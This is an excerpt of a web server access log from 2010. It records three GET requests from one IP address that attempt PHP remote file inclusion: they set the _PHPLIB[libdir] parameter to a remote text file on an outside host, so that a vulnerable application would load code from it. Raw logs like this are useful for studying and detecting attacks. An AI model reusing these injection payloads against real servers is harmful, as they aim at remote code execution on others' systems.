121.190.102.21 - - [04/May/2010:14:55:28 -0500] "GET //?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:14:55:28 -0500] "GET /logs/access_log.1272067200%20%20//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:14:55:28 -0500] "GET /logs//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
